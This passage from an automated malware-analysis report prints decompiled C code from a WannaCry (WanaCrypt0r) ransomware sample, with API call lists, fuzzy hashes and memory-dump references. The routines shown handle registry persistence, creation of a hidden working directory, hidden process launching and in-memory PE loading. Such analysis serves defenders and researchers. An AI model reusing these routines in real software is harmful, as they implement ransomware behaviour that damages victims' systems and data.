				_v12 = _v12 & 0x00000000;
				_t72 = "wd";
				do {
					_push( &_v8);
					_push( &_v216);
					if(_v12 != 0) {
						_push(0x80000001);
					} else {
						_push(0x80000002);
					}
					RegCreateKeyW();
					if(_v8 != 0) {
						if(_a4 == 0) {
							_v16 = 0x207;
							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
							asm("sbb esi, esi");
							_t77 =  ~_t44 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v736);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v736);
							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
							asm("sbb esi, esi");
							_t77 =  ~_t55 + 1;
						}
						RegCloseKey(_v8);
						if(_t77 != 0) {
							_t46 = 1;
							return _t46;
						} else {
							goto L10;
						}
					}
					L10:
					_v12 = _v12 + 1;
				} while (_v12 < 2);
				return 0;
			}
















                0x0040110f
                0x00401116
                0x00401118
                0x0040111c
                0x00401129
                0x0040113a
                0x0040113c
                0x0040113e
                0x0040114b
                0x00401151
                0x00401157
                0x0040115c
                0x00401164
                0x0040116b
                0x0040116c
                0x00401175
                0x0040116e
                0x0040116e
                0x0040116e
                0x0040117a
                0x00401183
                0x0040118c
                0x004011cf
                0x004011e4
                0x004011ee
                0x004011f0
                0x004011f1
                0x004011fa
                0x004011fa
                0x0040118e
                0x0040119a
                0x004011bd
                0x004011c7
                0x004011c9
                0x004011c9
                0x00401203
                0x0040120b
                0x00401222
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040120b
                0x0040120d
                0x0040120d
                0x00401210
                0x00000000

                APIs
                • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
                • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
                • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
                • strlen.MSVCRT(?), ref: 004011A7
                • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
                • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
                • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
                • RegCloseKey.ADVAPI32(00000000), ref: 00401203
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
                • String ID: 0@$Software\$WanaCrypt0r
                • API String ID: 865909632-3421300005
                • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
                • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123COMMON
                Download Yara Rule
                C-Code - Quality: 81%
                			E00401B5F(intOrPtr _a4) {
				void _v202;
				short _v204;
				void _v722;
				long _v724;
				signed short _v1240;
				void _v1242;
				long _v1244;
				void* _t55;
				signed int _t65;
				void* _t72;
				long _t83;
				void* _t94;
				void* _t98;

				_t83 =  *0x40f874; // 0x0
				_v1244 = _t83;
				memset( &_v1242, 0, 0x81 << 2);
				asm("stosw");
				_v724 = _t83;
				memset( &_v722, 0, 0x81 << 2);
				asm("stosw");
				_push(0x31);
				_v204 = _t83;
				memset( &_v202, 0, 0 << 2);
				asm("stosw");
				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
				GetWindowsDirectoryW( &_v1244, 0x104);
				_v1240 = _v1240 & 0x00000000;
				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
				_t98 = _t94 + 0x30;
				if(GetFileAttributesW( &_v724) == 0xffffffff) {
					L3:
					swprintf( &_v724, L"%s\\Intel",  &_v1244);
					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
						L2:
						_t55 = 1;
						return _t55;
					} else {
						GetTempPathW(0x104,  &_v724);
						if(wcsrchr( &_v724, 0x5c) != 0) {
							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
						}
						_t65 = E00401AF6( &_v724,  &_v204, _a4);
						asm("sbb eax, eax");
						return  ~( ~_t65);
					}
				}
				_t72 = E00401AF6( &_v724,  &_v204, _a4);
				_t98 = _t98 + 0xc;
				if(_t72 == 0) {
					goto L3;
				}
				goto L2;
			}
















                0x00401b68
                0x00401b80
                0x00401b87
                0x00401b89
                0x00401b95
                0x00401b9c
                0x00401b9e
                0x00401ba0
                0x00401bab
                0x00401bb4
                0x00401bb6
                0x00401bca
                0x00401bdd
                0x00401be9
                0x00401c04
                0x00401c06
                0x00401c19
                0x00401c40
                0x00401c53
                0x00401c70
                0x00401c38
                0x00401c3a
                0x00000000
                0x00401c8f
                0x00401c97
                0x00401cb2
                0x00401cbf
                0x00401cc4
                0x00401cd6
                0x00401ce0
                0x00000000
                0x00401ce2
                0x00401c70
                0x00401c2c
                0x00401c31
                0x00401c36
                0x00000000
                0x00000000
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                • GetFileAttributesW.KERNEL32(?), ref: 00401C10
                • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
                • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
                • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
                • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
                  • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                  • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                  • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                  • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
                • String ID: %s\Intel$%s\ProgramData
                • API String ID: 3806094219-198707228
                • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
                • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
				signed int _v8;
				intOrPtr _v40;
				char _v44;
				void* _t82;
				struct HINSTANCE__* _t83;
				intOrPtr* _t84;
				intOrPtr _t89;
				void* _t91;
				void* _t104;
				void _t107;
				intOrPtr _t116;
				intOrPtr _t124;
				signed int _t125;
				signed char _t126;
				intOrPtr _t127;
				signed int _t134;
				intOrPtr* _t145;
				signed int _t146;
				intOrPtr* _t151;
				intOrPtr _t152;
				short* _t153;
				signed int _t155;
				void* _t156;
				intOrPtr _t157;
				void* _t158;
				void* _t159;
				void* _t160;

				_v8 = _v8 & 0x00000000;
				_t3 =  &_a8; // 0x40213f
				if(E00402457( *_t3, 0x40) == 0) {
					L37:
					return 0;
				}
				_t153 = _a4;
				if( *_t153 == 0x5a4d) {
					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
						goto L37;
					}
					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
						goto L2;
					} else {
						_t9 = _t151 + 0x38; // 0x68004021
						_t126 =  *_t9;
						if((_t126 & 0x00000001) != 0) {
							goto L2;
						}
						_t12 = _t151 + 0x14; // 0x4080e415
						_t13 = _t151 + 6; // 0x4080e0
						_t146 =  *_t13 & 0x0000ffff;
						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
						if(_t146 <= 0) {
							L16:
							_t83 = GetModuleHandleA("kernel32.dll");
							if(_t83 == 0) {
								goto L37;
							}
							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
							_t159 = _t158 + 0xc;
							if(_t84 == 0) {
								goto L37;
							}
							 *_t84( &_v44);
							_t86 = _v40;
							_t23 = _t151 + 0x50; // 0xec8b55c3
							_t25 = _t86 - 1; // 0xec8b55c2
							_t27 = _t86 - 1; // -1
							_t134 =  !_t27;
							_t155 =  *_t23 + _t25 & _t134;
							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
								goto L2;
							}
							_t31 = _t151 + 0x34; // 0x85680040
							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
							_t127 = _t89;
							_t160 = _t159 + 0x14;
							if(_t127 != 0) {
								L21:
								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
								_t156 = _t91;
								if(_t156 != 0) {
									 *((intOrPtr*)(_t156 + 4)) = _t127;
									_t38 = _t151 + 0x16; // 0xc3004080
									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
									_t54 = _t151 + 0x54; // 0x8328ec83
									if(E00402457(_a8,  *_t54) == 0) {
										L36:
										E004029CC(_t156);
										goto L37;
									}
									_t57 = _t151 + 0x54; // 0x8328ec83
									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
									_t59 = _t151 + 0x54; // 0x8328ec83
									_a32 = _t104;
									memcpy(_t104, _a4,  *_t59);
									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
									 *_t156 = _t107;
									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
										goto L36;
									}
									_t68 = _t151 + 0x34; // 0x85680040
									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
										_t152 = 1;
										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
									} else {
										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
										_t152 = 1;
									}
									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
										if(_t116 == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = 0;
											L41:
											return _t156;
										}
										if( *(_t156 + 0x14) == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
											goto L41;
										}
										_push(0);
										_push(_t152);
										_push(_t127);
										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
											goto L41;
										}
										SetLastError(0x45a);
									}
									goto L36;
								}
								_a16(_t127, _t91, 0x8000, _a32);
								L23:
								SetLastError(0xe);
								L3:
								goto L37;
							}
							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
							_t160 = _t160 + 0x14;
							if(_t127 == 0) {
								goto L23;
							}
							goto L21;
						}
						_t145 = _t82 + 0xc;
						do {
							_t157 =  *((intOrPtr*)(_t145 + 4));
							_t124 =  *_t145;
							if(_t157 != 0) {
								_t125 = _t124 + _t157;
							} else {
								_t125 = _t124 + _t126;
							}
							if(_t125 > _v8) {
								_v8 = _t125;
							}
							_t145 = _t145 + 0x28;
							_t146 = _t146 - 1;
						} while (_t146 != 0);
						goto L16;
					}
				}
				L2:
				SetLastError(0xc1);
				goto L3;
			}






























                0x004021ef
                0x004021f8
                0x00402204
                0x0040243d
                0x00000000
                0x0040243d
                0x0040220a
                0x00402212
                0x00402239
                0x00000000
                0x00000000
                0x00402242
                0x0040224a
                0x00000000
                0x00402254
                0x00402254
                0x00402254
                0x0040225a
                0x00000000
                0x00000000
                0x0040225c
                0x00402260
                0x00402260
                0x00402266
                0x0040226a
                0x0040228c
                0x00402291
                0x00402299
                0x00000000
                0x00000000
                0x004022a7
                0x004022aa
                0x004022af
                0x00000000
                0x00000000
                0x004022b9
                0x004022bb
                0x004022be
                0x004022c1
                0x004022c8
                0x004022cb
                0x004022d1
                0x004022d7
                0x00000000
                0x00000000
                0x004022e8
                0x004022eb
                0x004022ee
                0x004022f0
                0x004022f5
                0x0040230f
                0x0040231a
                0x00402320
                0x00402324
                0x0040233d
                0x00402340
                0x0040234a
                0x00402350
                0x00402356
                0x0040235c
                0x00402362
                0x00402368
                0x0040236e
                0x00402374
                0x00402377
                0x00402386
                0x00402436
                0x00402437
                0x00000000
                0x0040243c
                0x00402396
                0x0040239a
                0x0040239d
                0x004023a0
                0x004023a7
                0x004023ba
                0x004023bc
                0x004023bf
                0x004023cc
                0x00000000
                0x00000000
                0x004023d3
                0x004023d3
                0x004023d6
                0x004023eb
                0x004023ec
                0x004023d8
                0x004023e0
                0x004023e6
                0x004023e6
                0x004023f8
                0x00402414
                0x00402419
                0x0040244d
                0x00402450
                0x00000000
                0x00402450
                0x0040241e
                0x00402448
                0x00000000
                0x00402448
                0x00402420
                0x00402421
                0x00402424
                0x00402429
                0x00402441
                0x00000000
                0x00402441
                0x00402430
                0x00402430
                0x00000000
                0x004023f8
                0x00402330
                0x00402336
                0x00402219
                0x00402219
                0x00000000
                0x00402219
                0x00402306
                0x00402308
                0x0040230d
                0x00000000
                0x00000000
                0x00000000
                0x0040230d
                0x0040226c
                0x0040226f
                0x0040226f
                0x00402272
                0x00402276
                0x0040227c
                0x00402278
                0x00402278
                0x00402278
                0x00402281
                0x00402283
                0x00402283
                0x00402286
                0x00402289
                0x00402289
                0x00000000
                0x0040226f
                0x0040224a
                0x00402214
                0x00402219
                0x00000000

                APIs
                  • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
                • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
                • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
                • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
                  • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
                • SetLastError.KERNEL32(0000045A), ref: 00402430
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
                • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
                • API String ID: 1900561814-3657104962
                • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
                • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45COMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
				void* _t15;
				WCHAR* _t17;

				CreateDirectoryW(_a4, 0);
				if(SetCurrentDirectoryW(_a4) == 0) {
					L2:
					return 0;
				}
				_t17 = _a8;
				CreateDirectoryW(_t17, 0);
				if(SetCurrentDirectoryW(_t17) != 0) {
					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
					if(_a12 != 0) {
						_push(_t17);
						swprintf(_a12, L"%s\\%s", _a4);
					}
					_t15 = 1;
					return _t15;
				}
				goto L2;
			}





                0x00401b07
                0x00401b16
                0x00401b27
                0x00000000
                0x00401b27
                0x00401b18
                0x00401b1e
                0x00401b25
                0x00401b36
                0x00401b40
                0x00401b42
                0x00401b4e
                0x00401b54
                0x00401b59
                0x00000000
                0x00401b59
                0x00000000

                APIs
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
                • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Directory$AttributesCreateCurrentFile$swprintf
                • String ID: %s\%s
                • API String ID: 1036847564-4073750446
                • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
                • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63processsynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 81%
                			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t32;
				intOrPtr _t37;

				_t32 = 0x10;
				_v88.cb = 0x44;
				memset( &(_v88.lpReserved), 0, _t32 << 2);
				_v20.hProcess = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t37 = 1;
				_v88.wShowWindow = 0;
				_v88.dwFlags = _t37;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 != 0) {
					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
						TerminateProcess(_v20.hProcess, 0xffffffff);
					}
					if(_a12 != 0) {
						GetExitCodeProcess(_v20.hProcess, _a12);
					}
				}
				CloseHandle(_v20);
				CloseHandle(_v20.hThread);
				return _t37;
			}







                0x00401070
                0x00401074
                0x0040107d
                0x00401082
                0x00401085
                0x00401086
                0x00401087
                0x0040108d
                0x0040108e
                0x004010a1
                0x004010b0
                0x00000000
                0x004010f7
                0x004010b5
                0x004010c5
                0x004010cc
                0x004010cc
                0x004010d5
                0x004010dd
                0x004010dd
                0x004010d5
                0x004010ec
                0x004010f1
                0x00000000

                APIs
                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
                • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
                • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
                • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
                • CloseHandle.KERNEL32(?), ref: 004010EC
                • CloseHandle.KERNEL32(?), ref: 004010F1
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                • String ID: D
                • API String ID: 786732093-2746444292
                • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
                • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                Download Yara Rule
                C-Code - Quality: 81%
                			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40d488);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x40f94c =  *0x40f94c | 0xffffffff;
				 *0x40f950 =  *0x40f950 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x40f948; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x40f944; // 0x0
				 *_t24 = _t47;
				 *0x40f954 = _adjust_fdiv;
				_t27 = E0040793F( *_adjust_fdiv);
				_t61 =  *0x40f870; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040793C);
				}
				E0040792A(_t27);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t29 =  *0x40f940; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0040791E();
				return _t41;
			}





























                0x004077bd
                0x004077bf
                0x004077c4
                0x004077cf
                0x004077d0
                0x004077dd
                0x004077e2
                0x004077e7
                0x004077ee
                0x004077f5
                0x004077fc
                0x00407802
                0x00407808
                0x0040780a
                0x00407810
                0x00407816
                0x0040781f
                0x00407824
                0x00407829
                0x0040782f
                0x00407836
                0x0040783c
                0x0040783d
                0x00407842
                0x00407847
                0x0040784c
                0x00407851
                0x00407856
                0x0040786f
                0x00407875
                0x0040787a
                0x0040787f
                0x0040788c
                0x0040788e
                0x00407894
                0x004078d0
                0x004078d0
                0x004078d3
                0x00000000
                0x00000000
                0x004078d5
                0x004078d6
                0x004078d6
                0x00407896
                0x00407896
                0x00407896
                0x00407897
                0x0040789a
                0x0040789c
                0x004078a7
                0x004078a9
                0x004078a9
                0x004078aa
                0x004078aa
                0x004078a7
                0x004078ad
                0x004078ad
                0x004078b1
                0x00000000
                0x00000000
                0x004078b7
                0x004078be
                0x004078c4
                0x004078c8
                0x004078dd
                0x004078ca
                0x004078ca
                0x004078ca
                0x004078e9
                0x004078ee
                0x004078f2
                0x004078f8
                0x004078fd
                0x004078ff
                0x00407902
                0x00407903
                0x00407904
                0x0040790b

                APIs
                • __set_app_type.MSVCRT(00000002), ref: 004077E7
                • __p__fmode.MSVCRT ref: 004077FC
                • __p__commode.MSVCRT ref: 0040780A
                • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
                • String ID:
                • API String ID: 3626615345-0
